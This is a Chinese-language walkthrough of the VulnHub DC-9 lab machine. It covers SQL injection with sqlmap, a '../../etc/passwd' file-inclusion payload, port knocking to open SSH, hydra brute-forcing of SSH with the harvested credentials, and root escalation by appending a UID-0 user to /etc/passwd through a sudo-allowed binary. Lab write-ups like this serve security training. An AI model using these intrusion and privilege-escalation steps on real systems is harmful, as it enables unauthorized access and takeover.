vulnhub系列:DC-9

vulnhub系列:DC-9

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

复制代码
nmap 192.168.23.0/24

nmap扫描IP 端口等信息

复制代码
nmap 192.168.23.144 -p- -sV -Pn -O

访问80端口

dirsearch目录扫描

复制代码
python3 dirsearch.py -u http://192.168.23.144/

页面查看,发现搜索框

发现登录框

sqlmap 工具跑一下,搜索框存在sql注入

库名

users下表名

UserDetails下字段

爆数据

登录框尝试,发现无法登录

爆一下另一个数据库Staff

表名

字段

数据

得到admin账号、密码,将密码进行md5解密

复制代码
transorbital1

登录admin账户

发现多了一个add record功能

之后没什么发现,拼接一下目录扫描的文件,也没什么发现

看到页面中显示文件不存在,可能存在文件包含,尝试在当前url路径拼接

复制代码
?file=../../../../..//etc/passwd

一些报告提到hnockd服务

复制代码
敲门端口服务,该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来"敲门",使系统开启需要访问的服务端口,才能对外访问,不使用时,再使用自定义序列号来"关门",将端口关闭,不对外监听,进一步提升了服务和系统的安全性

默认配置文件

复制代码
/etc/knockd.conf

通过文件包含查看其内容

根据文档,依次进行"敲门"

复制代码
nmap 192.168.23.144 -p 7469
nmap 192.168.23.144 -p 8475
nmap 192.168.23.144 -p 9842

再次扫描端口发现ssh服务已开启

二、getshell

将之前sql注入时得到的账号写入user.txt文件,密码写入pass.txt文件,使用hydra工具进行爆破

复制代码
hydra -L user.txt -P pass.txt 192.168.23.144 ssh

得到以下结果

复制代码
chandlerb		UrAG0D!
joeyt			Passw0rd
janitor			Ilovepeepee

依次进行ssh连接

账号1

复制代码
ssh chandlerb@192.168.23.144
UrAG0D!

没东西

账号2

复制代码
ssh joeyt@192.168.23.144
Passw0rd

也没东西

账号3

复制代码
ssh janitor@192.168.23.144
Ilovepeepee

发现多了一个目录

进入目录查看,发现存在几个密码

将其写入到 pass.txt 中,再次爆破,得到一个新的账号密码

复制代码
hydra -L user.txt -P pass.txt 192.168.23.144 ssh

fredf:B4-Tru3-001

三、提权

ssh 连接 fredf 用户,连接成功

复制代码
ssh fredf@192.168.23.144

查看当前目录没什么发现,查看当前权限

复制代码
sudo -l

看到 /opt/devstuff/dist/test/test 能以 root 权限执行,进入目录,test 文件查看是乱码,在 /opt/devstuff 下发现 test.py

查看文件内容

是一个脚本文件,生成一个用户,用root权限执行,将用户写入到 /etc/passwd 中

kali 执行命令

复制代码
openssl passwd -1 -salt dc9 123456

回到 /opt/devstuff/dist/test/ 目录,将账号密码写入 /tmp/dc9,再执行 test,将其写入到 /etc/passwd

复制代码
echo 'dc9:$1$dc9$3Qf9B8VT49B741CMh3R4m1:0:0::/root:/bin/bash' >> /tmp/dc9

sudo ./test /tmp/dc9 /etc/passwd

切换用户到 dc9,提权成功

复制代码
su dc9
123456

在 root 目录下,发现 theflag.txt,结束

相关推荐
九河云1 小时前
数字化转型中的网络安全风险与零信任架构实践
运维·科技·安全·web安全·架构
是Yu欸8 小时前
【博资考5】网安2025
网络·人工智能·经验分享·笔记·网络安全·ai·博资考
jenchoi4138 小时前
【2025-11-02】软件供应链安全日报:最新漏洞预警与投毒预警情报汇总
安全·web安全·网络安全
上海云盾-高防顾问8 小时前
什么是端口管理?网络安全的关键环节
安全·web安全
骥龙9 小时前
2.4、恶意软件猎手:基于深度学习的二进制文件判别
人工智能·深度学习·网络安全
儒道易行10 小时前
【攻防实战】通达OA文件上传联动Cobalt Strike打穿三层内网(下)
网络安全
风语者日志10 小时前
[LitCTF 2023]作业管理系统
前端·网络·安全·web安全·ctf
Never_z&y11 小时前
攻防世界-cat_cat_new(任意文件读取、Linux敏感文件、flask-session伪造)
web安全
belldeep12 小时前
网络安全:zoomeye.org ,Quake.360.cn
网络安全·zoomeye·quake.360
一只鹿鹿鹿12 小时前
系统安全设计方案书(Word)
开发语言·人工智能·web安全·需求分析·软件系统